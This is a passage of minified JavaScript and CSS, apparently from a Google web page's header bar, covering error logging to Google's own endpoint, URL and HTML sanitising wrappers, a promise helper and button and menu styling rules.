_.Jc=function(){this.data={}};_.Jc.prototype.o=function(){window.console&&window.console.log&&window.console.log("Log data: ",this.data)};_.Jc.prototype.j=function(a){var b=[],c;for(c in this.data)b.push(encodeURIComponent(c)+"="+encodeURIComponent(String(this.data[c])));return("atyp=i&zx="+(new Date).getTime()+"&"+b.join("&")).substr(0,a)}; var Kc=function(a,b){this.data={};var c=_.r(a,Cc,8)||new Cc;window.google&&window.google.kEI&&(this.data.ei=window.google.kEI);this.data.sei=_.u(_.D(a,10));this.data.ogf=_.u(_.D(c,3));this.data.ogrp=(window.google&&window.google.sn?!/.*hp$/.test(window.google.sn):_.t(_.F(a,7)))?"1":"";this.data.ogv=_.u(_.D(c,6))+"."+_.u(_.D(c,7));this.data.ogd=_.u(_.D(a,21));this.data.ogc=_.u(_.D(a,20));this.data.ogl=_.u(_.D(a,5));b&&(this.data.oggv=b)};_.w(Kc,_.Jc); var Ma="constructor hasOwnProperty isPrototypeOf propertyIsEnumerable toLocaleString toString valueOf".split(" "); _.Lc=function(a,b,c,d,e){Kc.call(this,a,b);_.Na(this.data,{jexpid:_.u(_.D(a,9)),srcpg:"prop="+_.u(_.D(a,6)),jsr:Math.round(1/d),emsg:c.name+":"+c.message});if(e){e._sn&&(e._sn="og."+e._sn);for(var f in e)this.data[encodeURIComponent(f)]=e[f]}};_.w(_.Lc,Kc); var Mc;_.Nc=function(){void 0===Mc&&(Mc=_.qb("ogb-qtm#html"));return Mc}; var Oc;_.Pc=function(a,b){this.j=b===Oc?a:""};_.h=_.Pc.prototype;_.h.Nb=!0;_.h.nb=function(){return this.j.toString()};_.h.Ee=!0;_.h.oc=function(){return 1};_.h.toString=function(){return this.j+""};_.Rc=function(a){return _.Qc(a).toString()};_.Qc=function(a){return a instanceof _.Pc&&a.constructor===_.Pc?a.j:"type_error:TrustedResourceUrl"};Oc={};_.Sc=function(a){var b=_.Nc();a=b?b.createScriptURL(a):a;return new _.Pc(a,Oc)}; var Wc,Xc,Tc;_.Uc=function(a,b){this.j=b===Tc?a:""};_.h=_.Uc.prototype;_.h.Nb=!0;_.h.nb=function(){return this.j.toString()};_.h.Ee=!0;_.h.oc=function(){return 1};_.h.toString=function(){return this.j.toString()};_.Vc=function(a){return a instanceof _.Uc&&a.constructor===_.Uc?a.j:"type_error:SafeUrl"};Wc=/^data:(.*);base64,[a-z0-9+\/]+=*$/i;Xc=/^(?:(?:https?|mailto|ftp):|[^:/?#]*(?:[/?#]|$))/i; _.Zc=function(a){if(a instanceof _.Uc)return a;a="object"==typeof a&&a.Nb?a.nb():String(a);Xc.test(a)?a=_.Yc(a):(a=String(a),a=a.replace(/(%0A|%0D)/g,""),a=a.match(Wc)?_.Yc(a):null);return a};_.$c=function(a){if(a instanceof _.Uc)return a;a="object"==typeof a&&a.Nb?a.nb():String(a);Xc.test(a)||(a="about:invalid#zClosurez");return _.Yc(a)};Tc={};_.Yc=function(a){return new _.Uc(a,Tc)};_.ad=_.Yc("about:invalid#zClosurez"); _.bd={};_.cd=function(a,b){this.j=b===_.bd?a:"";this.Nb=!0};_.cd.prototype.nb=function(){return this.j};_.cd.prototype.toString=function(){return this.j.toString()};_.dd=new _.cd("",_.bd);_.ed=RegExp("^[-,.\"'%_!#/ a-zA-Z0-9\\[\\]]+$");_.fd=RegExp("\\b(url\\([ \t\n]*)('[ -&(-\\[\\]-~]*'|\"[ !#-\\[\\]-~]*\"|[!#-&*-\\[\\]-~]*)([ \t\n]*\\))","g"); _.gd=RegExp("\\b(calc|cubic-bezier|fit-content|hsl|hsla|linear-gradient|matrix|minmax|radial-gradient|repeat|rgb|rgba|(rotate|scale|translate)(X|Y|Z|3d)?|var)\\([-+*/0-9a-zA-Z.%#\\[\\], ]+\\)","g"); var hd;hd={};_.id=function(a,b,c){this.j=c===hd?a:"";this.o=b;this.Nb=this.Ee=!0};_.id.prototype.oc=function(){return this.o};_.id.prototype.nb=function(){return this.j.toString()};_.id.prototype.toString=function(){return this.j.toString()};_.jd=function(a){return a instanceof _.id&&a.constructor===_.id?a.j:"type_error:SafeHtml"};_.kd=function(a,b){var c=_.Nc();a=c?c.createHTML(a):a;return new _.id(a,b,hd)};_.ld=new _.id(_.n.trustedTypes&&_.n.trustedTypes.emptyHTML||"",0,hd);_.md=_.kd("<br>",0); var od;_.nd=function(a){var b=!1,c;return function(){b||(c=a(),b=!0);return c}}(function(){var a=document.createElement("div"),b=document.createElement("div");b.appendChild(document.createElement("div"));a.appendChild(b);b=a.firstChild.firstChild;a.innerHTML=_.jd(_.ld);return!b.parentElement});od=/^[\w+/_-]+[=]{0,2}$/; _.pd=function(a){a=(a||_.n).document;return a.querySelector?(a=a.querySelector('style[nonce],link[rel="stylesheet"][nonce]'))&&(a=a.nonce||a.getAttribute("nonce"))&&od.test(a)?a:"":""}; _.qd=RegExp("^\\s{3,4}at(?: (?:(.*?)\\.)?((?:new )?(?:[a-zA-Z_$][\\w$]*|<anonymous>))(?: \\[as ([a-zA-Z_$][\\w$]*)\\])?)? (?:\\(unknown source\\)|\\(native\\)|\\((?:eval at )?((?:http|https|file)://[^\\s)]+|javascript:.*)\\)|((?:http|https|file)://[^\\s)]+|javascript:.*))$");_.rd=RegExp("^(?:(.*?)\\.)?([a-zA-Z_$][\\w$]*(?:/.?<)?)?(\\(.*\\))?@(?::0|((?:http|https|file)://[^\\s)]+|javascript:.*))$"); var sd,vd,ud;_.td=function(a){var b=window.google&&window.google.logUrl?"":"https://www.google.com";b+="/gen_204?use_corp=on&";b+=a.j(2040-b.length);sd(_.Zc(b)||_.ad)};sd=function(a){var b=new Image,c=ud;b.onerror=b.onload=b.onabort=function(){c in vd&&delete vd[c]};vd[ud++]=b;b.src=_.Vc(a)};vd=[];ud=0; _.wd=function(a){_.G.call(this,a)};_.w(_.wd,_.G); _.xd=function(a){var b="uc";if(a.uc&&a.hasOwnProperty(b))return a.uc;b=new a;return a.uc=b}; _.yd=function(){this.j={};this.o={}};_.Ad=function(a,b){var c=_.yd.j();if(a in c.j){if(c.j[a]!=b)throw new zd(a);}else{c.j[a]=b;if(b=c.o[a])for(var d=0,e=b.length;d<e;d++)b[d].j(c.j,a);delete c.o[a]}};_.Cd=function(a,b){if(b in a.j)return a.j[b];throw new Bd(b);};_.yd.j=function(){return _.xd(_.yd)};var Dd=function(){_.aa.call(this)};_.w(Dd,_.aa);var zd=function(){_.aa.call(this)};_.w(zd,Dd);var Bd=function(){_.aa.call(this)};_.w(Bd,Dd); var Gd=function(){var a=Ed;this.C=Fd;this.o=_.Ja(_.oc(a,2,.001),.001);this.D=_.t(_.F(a,1))&&Math.random()<this.o;this.F=_.Ja(_.qc(a,3,1),1);this.B=0;this.j=this.A=null};Gd.prototype.log=function(a,b){if(this.j){var c=new Ac;_.E(c,1,a.message);_.E(c,2,a.stack);_.E(c,3,a.lineNumber);_.E(c,5,1);var d=new _.Bc;_.pc(d,40,c);this.j.log(98,d)}try{if(this.D&&this.B<this.F){try{var e=(this.A||_.Cd(_.yd.j(),"lm")).B(a,b)}catch(f){e=new _.Lc(this.C,"quantum:gapiBuildLabel",a,this.o,b)}_.td(e);this.B++}}catch(f){}}; var Hd=[1,2,3,4,5,6,9,10,11,13,14,28,29,30,34,35,37,38,39,40,42,43,48,49,50,51,52,53,62,500],Kd=function(a,b,c,d,e,f){Kc.call(this,a,b);_.Na(this.data,{oge:d,ogex:_.u(_.D(a,9)),ogp:_.u(_.D(a,6)),ogsr:Math.round(1/(Id(d)?_.Ja(_.oc(c,3,1)):_.Ja(_.oc(c,2,1E-4)))),ogus:e});if(f){"ogw"in f&&(this.data.ogw=f.ogw,delete f.ogw);"ved"in f&&(this.data.ved=f.ved,delete f.ved);a=[];for(var g in f)0!=a.length&&a.push(","),a.push(Jd(g)),a.push("."),a.push(Jd(f[g]));f=a.join("");""!=f&&(this.data.ogad=f)}}; _.w(Kd,Kc);var Jd=function(a){a=String(a);return a.replace(".","%2E").replace(",","%2C")},Id=function(a){if(!Ld){Ld={};for(var b=0;b<Hd.length;b++)Ld[Hd[b]]=!0}return!!Ld[a]},Ld=null; var Md=function(a){_.G.call(this,a)};_.w(Md,_.G); var Qd=function(){var a=Nd,b=Od,c=Pd;this.o=a;this.j=b;this.B=_.Ja(_.oc(a,2,1E-4),1E-4);this.D=_.Ja(_.oc(a,3,1),1);b=Math.random();this.A=_.t(_.F(a,1))&&b<this.B;this.C=_.t(_.F(a,1))&&b<this.D;a=0;_.t(_.F(c,1))&&(a|=1);_.t(_.F(c,2))&&(a|=2);_.t(_.F(c,3))&&(a|=4);this.F=a};Qd.prototype.log=function(a,b){try{if(Id(a)?this.C:this.A){var c=new Kd(this.j,"quantum:gapiBuildLabel",this.o,a,this.F,b);_.td(c)}}catch(d){}}; _.Rd=function(a){this.ua=a;this.j=void 0;this.o=[]};_.Rd.prototype.then=function(a,b,c){this.o.push(new Sd(a,b,c));Td(this)};_.Rd.prototype.resolve=function(a){if(void 0!==this.ua||void 0!==this.j)throw Error("H");this.ua=a;Td(this)};_.Rd.prototype.reject=function(a){if(void 0!==this.ua||void 0!==this.j)throw Error("H");this.j=a;Td(this)};var Td=function(a){if(0<a.o.length){var b=void 0!==a.ua,c=void 0!==a.j;if(b||c){b=b?a.A:a.B;c=a.o;a.o=[];try{_.vb(c,b,a)}catch(d){console.error(d)}}}}; _.Rd.prototype.A=function(a){a.o&&a.o.call(a.j,this.ua)};_.Rd.prototype.B=function(a){a.A&&a.A.call(a.j,this.j)};var Sd=function(a,b,c){this.o=a;this.A=b;this.j=c}; _.I=function(){this.B=new _.Rd;this.j=new _.Rd;this.G=new _.Rd;this.D=new _.Rd;this.F=new _.Rd;this.H=new _.Rd;this.C=new _.Rd;this.A=new _.Rd;this.o=new _.Rd;this.K=new _.Rd};_.h=_.I.prototype;_.h.Ph=function(){return this.B};_.h.Xh=function(){return this.j};_.h.hi=function(){return this.G};_.h.Wh=function(){return this.D};_.h.di=function(){return this.F};_.h.Th=function(){return this.H};_.h.Uh=function(){return this.C};_.h.Jh=function(){return this.A};_.h.Ih=function(){return this.o};_.I.j=function(){return _.xd(_.I)}; var Ud=function(a){_.G.call(this,a)};_.w(Ud,_.G);_.Wd=function(){return _.r(_.Vd,_.Dc,1)};_.Xd=function(){return _.r(_.Vd,_.Ec,5)}; var Yd;window.gbar_&&window.gbar_.CONFIG?Yd=window.gbar_.CONFIG[0]||{}:Yd=[];_.Vd=new Ud(Yd); var Ed,Fd,Od,Pd,Nd;Ed=_.r(_.Vd,_.wd,3)||new _.wd;Fd=_.Wd()||new _.Dc;_.J=new Gd;Od=_.Wd()||new _.Dc;Pd=_.Xd()||new _.Ec;Nd=_.r(_.Vd,Md,4)||new Md;_.Zd=new Qd; _.z("gbar_._DumpException",function(a){_.J?_.J.log(a):console.error(a)}); _.$d=new Gc(_.J); _.Zd.log(8,{m:"BackCompat"==document.compatMode?"q":"s"});_.z("gbar.A",_.Rd);_.Rd.prototype.aa=_.Rd.prototype.then;_.z("gbar.B",_.I);_.I.prototype.ba=_.I.prototype.Xh;_.I.prototype.bb=_.I.prototype.hi;_.I.prototype.bd=_.I.prototype.di;_.I.prototype.bf=_.I.prototype.Ph;_.I.prototype.bg=_.I.prototype.Wh;_.I.prototype.bh=_.I.prototype.Th;_.I.prototype.bi=_.I.prototype.Uh;_.I.prototype.bj=_.I.prototype.Jh;_.I.prototype.bk=_.I.prototype.Ih;_.z("gbar.a",_.I.j());var ae=new Fc(window);_.Ad("api",ae); var be=_.Xd()||new _.Ec;window.__PVT=_.u(_.D(be,8));_.Ad("eq",_.$d); }catch(e){_._DumpException(e)} try{ var ce=function(a){_.G.call(this,a)};_.w(ce,_.G); var de=function(){_.H.call(this);this.o=[];this.j=[]};_.w(de,_.H);de.prototype.A=function(a,b){this.o.push({features:a,options:b})};de.prototype.init=function(a,b,c){window.gapi={};var d=window.___jsl={};d.h=_.u(_.D(a,1));_.lc(a,12)&&(d.dpo=_.t(_.F(a,12)));d.ms=_.u(_.D(a,2));d.m=_.u(_.D(a,3));d.l=[];_.D(b,1)&&(a=_.D(b,3))&&this.j.push(a);_.D(c,1)&&(c=_.D(c,2))&&this.j.push(c);_.z("gapi.load",(0,_.y)(this.A,this));return this}; var ee=_.r(_.Vd,_.Hc,14)||new _.Hc,fe=_.r(_.Vd,_.Ic,9)||new _.Ic,ge=new ce,he=new de;he.init(ee,fe,ge);_.Ad("gs",he); }catch(e){_._DumpException(e)} })(this.gbar_); // Google Inc. </script><style>h1,ol,ul,li,button{margin:0;padding:0}button{border:none;background:none}body{background:#fff}body,input,button{font-size:14px;font-family:arial,sans-serif;color:#202124}a{color:#1a0dab;text-decoration:none}a:hover,a:active{text-decoration:underline}a:visited{color:#609}html,body{min-width:400px}body,html{height:100%;margin:0;padding:0}.gb_Za:not(.gb_Ed){font:13px/27px Roboto,RobotoDraft,Arial,sans-serif;z-index:986}@-moz-keyframes gb__a{0%{opacity:0}50%{opacity:1}}@keyframes gb__a{0%{opacity:0}50%{opacity:1}}a.gb_W{border:none;color:#4285f4;cursor:default;font-weight:bold;outline:none;position:relative;text-align:center;text-decoration:none;text-transform:uppercase;white-space:nowrap;-moz-user-select:none}a.gb_W:hover:after,a.gb_W:focus:after{background-color:rgba(0,0,0,.12);content:'';height:100%;left:0;position:absolute;top:0;width:100%}a.gb_W:hover,a.gb_W:focus{text-decoration:none}a.gb_W:active{background-color:rgba(153,153,153,.4);text-decoration:none}a.gb_X{background-color:#4285f4;color:#fff}a.gb_X:active{background-color:#0043b2}.gb_Z{-moz-box-shadow:0 1px 1px rgba(0,0,0,.16);box-shadow:0 1px 1px rgba(0,0,0,.16)}.gb_W,.gb_X,.gb_0,.gb_1{display:inline-block;line-height:28px;padding:0 12px;-moz-border-radius:2px;border-radius:2px}.gb_0{background:#f8f8f8;border:1px solid #c6c6c6}.gb_1{background:#f8f8f8}.gb_0,#gb a.gb_0.gb_0,.gb_1{color:#666;cursor:default;text-decoration:none}#gb a.gb_1.gb_1{cursor:default;text-decoration:none}.gb_1{border:1px solid #4285f4;font-weight:bold;outline:none;background:#4285f4;background:-moz-linear-gradient(top,#4387fd,#4683ea);background:linear-gradient(top,#4387fd,#4683ea);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=#4387fd,endColorstr=#4683ea,GradientType=0)}#gb a.gb_1.gb_1{color:#fff}.gb_1:hover{-moz-box-shadow:0 1px 0 rgba(0,0,0,.15);box-shadow:0 1px 0 rgba(0,0,0,.15)}.gb_1:active{-moz-box-shadow:inset 0 2px 0 rgba(0,0,0,.15);box-shadow:inset 0 2px 0 rgba(0,0,0,.15);background:#3c78dc;background:-moz-linear-gradient(top,#3c7ae4,#3f76d3);background:linear-gradient(top,#3c7ae4,#3f76d3);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=#3c7ae4,endColorstr=#3f76d3,GradientType=0)}.gb_ya{display:none!important}.gb_za{visibility:hidden}.gb_ed{display:inline-block;vertical-align:middle}.gb_wf{position:relative}.gb_A{display:inline-block;outline:none;vertical-align:middle;-moz-border-radius:2px;border-radius:2px;-moz-box-sizing:border-box;box-sizing:border-box;height:40px;width:40px;color:#000;cursor:pointer;text-decoration:none}#gb#gb a.gb_A{color:#000;cursor:pointer;text-decoration:none}.gb_1a{border-color:transparent;border-bottom-color:#fff;border-style:dashed dashed solid;border-width:0 8.5px 8.5px;display:none;position:absolute;left:11.5px;top:43px;z-index:1;height:0;width:0;-moz-animation:gb__a .2s;animation:gb__a .2s}.gb_2a{border-color:transparent;border-style:dashed dashed solid;border-width:0 8.5px 8.5px;display:none;position:absolute;left:11.5px;z-index:1;height:0;width:0;-moz-animation:gb__a .2s;animation:gb__a .2s;border-bottom-color:#ccc;border-bottom-color:rgba(0,0,0,.2);top:42px}x:-o-prefocus,div.gb_2a{border-bottom-color:#ccc}.gb_C{background:#fff;border:1px solid #ccc;border-color:rgba(0,0,0,.2);color:#000;-moz-box-shadow:0 2px 10px rgba(0,0,0,.2);box-shadow:0 2px 10px rgba(0,0,0,.2);display:none;outline:none;overflow:hidden;position:absolute;right:8px;top:62px;-moz-animation:gb__a .2s;animation:gb__a .2s;-moz-border-radius:2px;border-radius:2px;-moz-user-select:text}.gb_ed.gb_ja .gb_1a,.gb_ed.gb_ja .gb_2a,.gb_ed.gb_ja .gb_C,.gb_ja.gb_C{display:block}.gb_ed.gb_ja.gb_xf .gb_1a,.gb_ed.gb_ja.gb_xf .gb_2a{display:none}.gb_yf{position:absolute;right:8px;top:62px;z-index:-1}.gb_Ha .gb_1a,.gb_Ha .gb_2a,.gb_Ha .gb_C{margin-top:-10px}.gb_ed:first-child,#gbsfw:first-child+.gb_ed{padding-left:4px}.gb_na.gb_Oe .gb_ed:first-child{padding-left:0}.gb_Pe{position:relative}.gb_Pc .gb_Pe,.gb_Vd .gb_Pe{float:right}.gb_A{padding:8px;cursor:pointer}.gb_na .gb_6c:not(.gb_W):focus img{background-color:rgba(0,0,0,0.20);outline:none;-moz-border-radius:50%;border-radius:50%}.gb_Qe button:focus svg,.gb_Qe button:hover svg,.gb_Qe button:active svg,.gb_A:focus,.gb_A:hover,.gb_A:active,.gb_A[aria-expanded=true]{outline:none;-moz-border-radius:50%;border-radius:50%}.gb_yc .gb_Qe.gb_Re button:focus svg,.gb_yc .gb_Qe.gb_Re button:focus:hover svg,.gb_Qe button:focus svg,.gb_Qe button:focus:hover svg,.gb_A:focus,.gb_A:focus:hover{background-color:rgba(60,64,67,0.1)}.gb_yc .gb_Qe.gb_Re button:active svg,.gb_Qe button:active svg,.gb_A:active{background-color:rgba(60,64,67,0.12)}.gb_yc .gb_Qe.gb_Re button:hover svg,.gb_Qe button:hover svg,.gb_A:hover{background-color:rgba(60,64,67,0.08)}.gb_ga .gb_A.gb_Ka:hover{background-color:transparent}.gb_A[aria-expanded=true],.gb_A:hover[aria-expanded=true]{background-color:rgba(95,99,104,0.24)}.gb_A[aria-expanded=true] .gb_Se,.gb_A[aria-expanded=true] .gb_Te{fill:#5f6368;opacity:1}.gb_yc .gb_Qe button:hover svg,.gb_yc .gb_A:hover{background-color:rgba(232,234,237,0.08)}.gb_yc .gb_Qe button:focus svg,.gb_yc .gb_Qe button:focus:hover svg,.gb_yc .gb_A:focus,.gb_yc .gb_A:focus:hover{background-color:rgba(232,234,237,0.10)}.gb_yc .gb_Qe button:active svg,.gb_yc .gb_A:active{background-color:rgba(232,234,237,0.12)}.gb_yc .gb_A[aria-expanded=true],.gb_yc .gb_A:hover[aria-expanded=true]{background-color:rgba(255,255,255,0.12)}.gb_yc .gb_A[aria-expanded=true] .gb_Se,.gb_yc .gb_A[aria-expanded=true] .gb_Te{fill:#ffffff;opacity:1}.gb_ed{padding:4px}.gb_na.gb_Oe .gb_ed{padding:4px 2px}.gb_na.gb_Oe .gb_La.gb_ed{padding-left:6px}.gb_C{z-index:991;line-height:normal}.gb_C.gb_Ue{left:8px;right:auto}@media (max-width:350px){.gb_C.gb_Ue{left:0}}.gb_Ve .gb_C{top:56px}.gb_z .gb_A,.gb_B .gb_z .gb_A{background-position:-64px -29px}.gb_g .gb_z .gb_A{background-position:-29px -29px;opacity:1}.gb_z .gb_A,.gb_z .gb_A:hover,.gb_z .gb_A:focus{opacity:1}.gb_Fd{display:none}.gb_Xc{font-family:Google Sans,Roboto,RobotoDraft,Helvetica,Arial,sans-serif;font-size:20px;font-weight:400;letter-spacing:0.25px;line-height:48px;margin-bottom:2px;opacity:1;overflow:hidden;padding-left:16px;position:relative;text-overflow:ellipsis;vertical-align:middle;top:2px;white-space:nowrap;flex:1 1 auto}.gb_Xc.gb_Zc{color:#3c4043}.gb_na.gb_oa .gb_Xc{margin-bottom:0}.gb_0c.gb_1c .gb_Xc{padding-left:4px}.gb_na.gb_oa .gb_2c{position:relative;top:-2px}.gb_na{color:black;min-width:320px;position:relative;-moz-transition:box-shadow 250ms;transition:box-shadow 250ms}.gb_na.gb_Hc{min-width:240px}.gb_na.gb_Hd .gb_Id{display:none}.gb_na.gb_Hd .gb_Jd{height:56px}header.gb_na{display:block}.gb_na svg{fill:currentColor}.gb_Kd{position:fixed;top:0;width:100%}.gb_Ld{-moz-box-shadow:0px 4px 5px 0px rgba(0,0,0,0.14),0px 1px 10px 0px rgba(0,0,0,0.12),0px 2px 4px -1px rgba(0,0,0,0.2);box-shadow:0px 4px 5px 0px rgba(0,0,0,0.14),0px 1px 10px 0px rgba(0,0,0,0.12),0px 2px 4px -1px rgba(0,0,0,0.2)}.gb_Md{height:64px}.gb_Jd{box-sizing:border-box;position:relative;width:100%;display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;justify-content:space-between;min-width:-webkit-min-content;min-width:-moz-min-content;min-width:-ms-min-content;min-width:min-content}.gb_na:not(.gb_oa) .gb_Jd{padding:8px}.gb_na.gb_Nd .gb_Jd{flex:1 0 auto}.gb_na .gb_Jd.gb_Od.gb_Pd{min-width:0}.gb_na.gb_oa .gb_Jd{padding:4px;padding-left:8px;min-width:0}.gb_Id{height:48px;vertical-align:middle;white-space:nowrap;-moz-box-align:center;align-items:center;display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;-moz-user-select:-moz-none}.gb_Rd>.gb_Id{display:table-cell;width:100%}.gb_0c{padding-right:30px;-moz-box-sizing:border-box;box-sizing:border-box;flex:1 0 auto}.gb_na.gb_oa .gb_0c{padding-right:14px}.gb_Sd{flex:1 1 100%}.gb_Sd>:only-child{display:inline-block}.gb_Td.gb_Qc{padding-left:4px}.gb_Td.gb_Ud,.gb_na.gb_Nd .gb_Td,.gb_na.gb_oa:not(.gb_Vd) .gb_Td{padding-left:0}.gb_na.gb_oa .gb_Td.gb_Ud{padding-right:0}.gb_na.gb_oa .gb_Td.gb_Ud .gb_ga{margin-left:10px}.gb_Qc{display:inline}.gb_na.gb_Kc .gb_Td.gb_Wd,.gb_na.gb_Vd .gb_Td.gb_Wd{padding-left:2px}.gb_Xc{display:inline-block}.gb_Td{box-sizing:border-box;height:48px;line-height:normal;padding:0 4px;padding-left:30px;flex:0 0 auto;justify-content:flex-end}.gb_Vd{height:48px}.gb_na.gb_Vd{min-width:initial;min-width:auto}.gb_Vd .gb_Td{float:right;padding-left:32px}.gb_Vd .gb_Td.gb_Xd{padding-left:0}.gb_Zd{font-size:14px;max-width:200px;overflow:hidden;padding:0 12px;text-overflow:ellipsis;white-space:nowrap;-moz-user-select:text}.gb_0d{transition:background-color .4s}.gb_1d{color:black}.gb_yc{color:white}.gb_na a,.gb_Dc a{color:inherit}.gb_q{color:rgba(0,0,0,0.87)}.gb_na svg,.gb_Dc svg,.gb_0c .gb_2d,.gb_Pc .gb_2d{color:#5f6368;opacity:1}.gb_yc svg,.gb_Dc.gb_Ic svg,.gb_yc .gb_0c .gb_2d,.gb_yc .gb_0c .gb_xc,.gb_yc .gb_0c .gb_2c,.gb_Dc.gb_Ic .gb_2d{color:rgba(255,255,255,0.87)}.gb_yc .gb_0c .gb_wc:not(.gb_3d){opacity:0.87}.gb_Zc{color:inherit;opacity:1;text-rendering:optimizeLegibility;-moz-osx-font-smoothing:grayscale}.gb_yc .gb_Zc,.gb_1d .gb_Zc{opacity:1}.gb_4d{position:relative}.gb_5d{font-family:arial,sans-serif;line-height:normal;padding-right:15px}a.gb_d,span.gb_d{color:rgba(0,0,0,0.87);text-decoration:none}.gb_yc a.gb_d,.gb_yc span.gb_d{color:white}a.gb_d:focus{outline-offset:2px}a.gb_d:hover{text-decoration:underline}.gb_e{display:inline-block;padding-left:15px}.gb_e .gb_d{display:inline-block;line-height:24px;vertical-align:middle}.gb_6d{font-family:Google Sans,Roboto,RobotoDraft,Helvetica,Arial,sans-serif;font-weight:500;font-size:14px;letter-spacing:0.25px;line-height:16px;margin-left:10px;margin-right:8px;min-width:96px;padding:9px 23px;text-align:center;vertical-align:middle;-moz-border-radius:4px;border-radius:4px;-moz-box-sizing:border-box;box-sizing:border-box}.gb_na.gb_Vd .gb_6d{margin-left:8px}#gb a.gb_1.gb_1.gb_6d,#gb a.gb_0.gb_0.gb_6d{cursor:pointer}.gb_1.gb_6d:hover{background:#2b7de9;-moz-box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15);box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15)}.gb_1.gb_6d:focus,.gb_1.gb_6d:hover:focus{background:#5094ed;-moz-box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15);box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15)}.gb_1.gb_6d:active{background:#63a0ef;-moz-box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15);box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15)}.gb_6d:not(.gb_0){background:#1a73e8;border:1px solid transparent}.gb_na.gb_oa .gb_6d{padding:9px 15px;min-width:80px}.gb_7d{text-align:left}#gb a.gb_6d.gb_0,#gb .gb_yc a.gb_6d,#gb.gb_yc a.gb_6d{background:#ffffff;border-color:#dadce0;-moz-box-shadow:none;box-shadow:none;color:#1a73e8}#gb a.gb_1.gb_ha.gb_6d{background:#8ab4f8;border:1px solid transparent;-moz-box-shadow:none;box-shadow:none;color:#202124}#gb a.gb_6d.gb_0:hover,#gb .gb_yc a.gb_6d:hover,#gb.gb_yc a.gb_6d:hover{background:#f8fbff;border-color:#cce0fc}#gb a.gb_1.gb_ha.gb_6d:hover{background:#93baf9;border-color:transparent;-moz-box-shadow:0 1px 3px 1px rgba(0,0,0,0.15),0 1px 2px rgba(0,0,0,0.3);box-shadow:0 1px 3px 1px rgba(0,0,0,0.15),0 1px 2px rgba(0,0,0,0.3)}#gb a.gb_6d.gb_0:focus,#gb a.gb_6d.gb_0:focus:hover,#gb .gb_yc a.gb_6d:focus,#gb .gb_yc a.gb_6d:focus:hover,#gb.gb_yc a.gb_6d:focus,#gb.gb_yc a.gb_6d:focus:hover{background:#f4f8ff;border-color:#c9ddfc}#gb a.gb_1.gb_ha.gb_6d:focus,#gb a.gb_1.gb_ha.gb_6d:focus:hover{background:#a6c6fa;border-color:transparent;-moz-box-shadow:none;box-shadow:none}#gb a.gb_6d.gb_0:active,#gb .gb_yc a.gb_6d:active,#gb.gb_yc a.gb_6d:active{background:#ecf3fe}#gb a.gb_1.gb_ha.gb_6d:active{background:#a1c3f9;-moz-box-shadow:0 1px 2px rgba(60,64,67,0.3),0 2px 6px 2px rgba(60,64,67,0.15);box-shadow:0 1px 2px rgba(60,64,67,0.3),0 2px 6px 2px rgba(60,64,67,0.15)}#gb a.gb_6d.gb_0:not(.gb_ha):active{-moz-box-shadow:0 1px 2px 0 rgba(60,64,67,0.3),0 2px 6px 2px rgba(60,64,67,0.15);box-shadow:0 1px 2px 0 rgba(60,64,67,0.3),0 2px 6px 2px rgba(60,64,67,0.15)}.gb_ga{background-color:rgba(255,255,255,0.88);border:1px solid #dadce0;box-sizing:border-box;cursor:pointer;display:inline-block;max-height:48px;overflow:hidden;outline:none;padding:0;vertical-align:middle;width:134px;-moz-border-radius:8px;border-radius:8px}.gb_ga.gb_ha{background-color:transparent;border:1px solid #5f6368}.gb_ia{display:inherit}.gb_ga.gb_ha .gb_ia{background:#ffffff;-moz-border-radius:4px;border-radius:4px;display:inline-block;left:8px;margin-right:5px;position:relative;padding:3px;top:-1px}.gb_ga:hover{border:1px solid #d2e3fc;background-color:rgba(248,250,255,0.88)}.gb_ga.gb_ha:hover{background-color:rgba(241,243,244,0.04);border:1px solid #5f6368}.gb_ga:focus{background-color:rgba(255,255,255);border:1px solid #fff;-moz-box-shadow:0px 1px 2px 0px rgba(60,64,67,0.3),0px 1px 3px 1px rgba(60,64,67,0.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,0.3),0px 1px 3px 1px rgba(60,64,67,0.15)}.gb_ga.gb_ha:focus{background-color:rgba(241,243,244,0.12);border:1px solid #f1f3f4;-moz-box-shadow:0 1px 3px 1px rgba(0,0,0,0.15),0 1px 2px 0 rgba(0,0,0,0.3);box-shadow:0 1px 3px 1px rgba(0,0,0,0.15),0 1px 2px 0 rgba(0,0,0,0.3)}.gb_ga.gb_ha:active,.gb_ga.gb_ja.gb_ha:focus{background-color:rgba(241,243,244,0.1);border:1px solid #5f6368}.gb_ka{display:inline-block;padding-bottom:2px;padding-left:7px;padding-top:2px;text-align:center;vertical-align:middle;line-height:32px;width:78px}.gb_ga.gb_ha .gb_ka{line-height:26px;margin-left:0;padding-bottom:0;padding-left:0;padding-top:0;width:72px}.gb_ka.gb_la{background-color:#f1f3f4;-moz-border-radius:4px;border-radius:4px;margin-left:8px;padding-left:0}.gb_ka.gb_la .gb_ma{vertical-align:middle}.gb_na:not(.gb_oa) .gb_ga{margin-left:10px;margin-right:4px}.gb_pa{max-height:32px;width:78px}.gb_ga.gb_ha .gb_pa{max-height:26px;width:72px}.gb_Aa{background-size:32px 32px;border:0;-moz-border-radius:50%;border-radius:50%;display:block;margin:0px;position:relative;height:32px;width:32px;z-index:0}.gb_Ba{background-color:#e8f0fe;border:1px solid rgba(32,33,36,.08);position:relative}.gb_Ba.gb_Aa{height:30px;width:30px}.gb_Ba.gb_Aa:hover,.gb_Ba.gb_Aa:active{-moz-box-shadow:none;box-shadow:none}.gb_Ca{background:#fff;border:none;-moz-border-radius:50%;border-radius:50%;bottom:2px;-moz-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px 